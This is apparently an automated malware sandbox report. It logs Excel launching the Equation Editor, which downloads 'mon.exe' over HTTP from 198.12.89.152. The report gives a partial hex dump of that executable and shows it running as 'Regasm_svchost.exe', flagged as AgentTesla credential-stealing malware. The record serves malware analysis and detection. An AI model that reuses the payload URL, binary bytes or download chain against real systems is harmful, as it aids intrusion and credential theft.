                  Aug 8, 2022 17:26:51.145034075 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145050049 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145066023 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145081043 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145097017 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145112038 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145123959 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145128965 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145143986 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145152092 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145159960 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145170927 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145176888 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145190001 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145191908 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145207882 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145210028 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145224094 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145229101 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145239115 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145246029 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145255089 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145263910 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145270109 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145284891 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145287037 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145303011 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145307064 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145318031 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145329952 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145334005 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145342112 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145350933 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145359039 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145365953 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145376921 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145382881 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145394087 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145401001 CEST8049179198.12.89.152192.168.2.22
                  Aug 8, 2022 17:26:51.145411015 CEST4917980192.168.2.22198.12.89.152
                  Aug 8, 2022 17:26:51.145416975 CEST8049179198.12.89.152192.168.2.22
                  • 198.12.89.152
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249179198.12.89.15280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Aug 8, 2022 17:26:50.796442986 CEST0OUTGET /mon/mon.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 198.12.89.152
                  Connection: Keep-Alive
                  Aug 8, 2022 17:26:50.915329933 CEST1INHTTP/1.1 200 OK
                  Date: Mon, 08 Aug 2022 15:26:50 GMT
                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.19
                  Last-Modified: Mon, 08 Aug 2022 13:26:41 GMT
                  ETag: "dae00-5e5bac4276722"
                  Accept-Ranges: bytes
                  Content-Length: 896512
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d 0f f1 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a6 0d 00 00 06 00 00 00 00 00 00 2e c5 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 c4 0d 00 53 00 00 00 00 e0 0d 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a5 0d 00 00 20 00 00 00 a6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 e0 0d 00 00 04 00 00 00 a8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 ac 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c5 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 d2 0c 00 d0 f2 00 00 03 00 00 00 b7 00 00 06 28 b0 00 00 e0 21 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 07 00 d8 00 00 00 01 00 00 11 02 19 8d 4b 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 4b 00 00 70 a2 25 18 72 59 00 00 70 a2 7d 02 00 00 04 02 14 7d 03 00 00 04 02 28 16 00 00 0a 20 03 6d 2f 17 20 e3 d6 7e 66 61 25 0a 1c 5e 45 06 00 00 00 19 00 00 00 35 00 00 00 02 00 00 00 64 00 00 00 d4 ff ff ff 45 00 00 00 2b 62 00 00 02 28 13 00 00 06 06 20 7e a4 05 de 5a 20 b0 66 13 3d 61 2b c0 02 7b 0f 00 00 04 1b 28 19 00 00 06 00 06 20 90 2c 64 b5 5a 20 cc df a4 7b 61 2b a4 00 06 20 99 ca 63 a7 5a 20 26 cf 38 56 61 2b 94 00 02 7b 19 00 00 04 1b 28 19 00 00 06 06 20 aa 93 e2 7a 5a 20 10 37 37 e8 61 38 75 ff ff ff 7e 04 00 00 04 74 03 00 00 01 02 7b 02 00 00 04 28 1a 00 00 06 26 2a 13 30 03 00 3a 00 00 00 01 00 00 11 00 20 92 ef 9c 68 20 91 b6 de 3e 61 25 0a 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 17 00 00 00 2b 15 02 28 08 00 00 06 06 20 36 3b d9 f4 5a 20 51 62 bd 9d 61 2b ce 00 2a 00 00 13 30 02 00 02 00 00 00 01 00 00 11 00 2a 00 00 1b 30 05 00 ca 03 00 00 02 00 00 11 00 14 0a 14 0b 00 02 7b 06 00 00 04 28 1b 00 00 06 16 28 1c 00 00 06 0c 20 93 ed 15 05 20 f9 72 47 0a 61 25 13 09 1f 17 5e 45 17 00 00 00 11 01 00 00 05 00 00 00 86 01 00 00 76 02 00 00 55 00 00 00 89 00 00 00 8e ff
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb0. @ @S H.text4 `.rsrc@@.reloc@BH(!0*0K%rp%rKp%rYp}}( m/ ~fa%^E5dE+b( ~Z f=a+{( ,dZ {a+ cZ &8Va+{( zZ 77a8u~t{(&*0: h >a%^E+( 6;Z Qba+*0*0{(( rGa%^EvU


                  Click to jump to process

                  Target ID:0
                  Start time:17:26:17
                  Start date:08/08/2022
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f450000
                  File size:28253536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:17:26:42
                  Start date:08/08/2022
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:5
                  Start time:17:26:53
                  Start date:08/08/2022
                  Path:C:\Users\Public\Regasm_svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\Public\Regasm_svchost.exe"
                  Imagebase:0x1010000
                  File size:896512 bytes
                  MD5 hash:A6439DBBF3F848EB6F83494C5C75A7A6
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.989370105.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000005.00000002.988587111.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low

                  Target ID:6
                  Start time:17:26:56
                  Start date:08/08/2022
                  Path:C:\Users\Public\Regasm_svchost.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\Public\Regasm_svchost.exe
                  Imagebase:0x1010000
                  File size:896512 bytes
                  MD5 hash:A6439DBBF3F848EB6F83494C5C75A7A6
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  No disassembly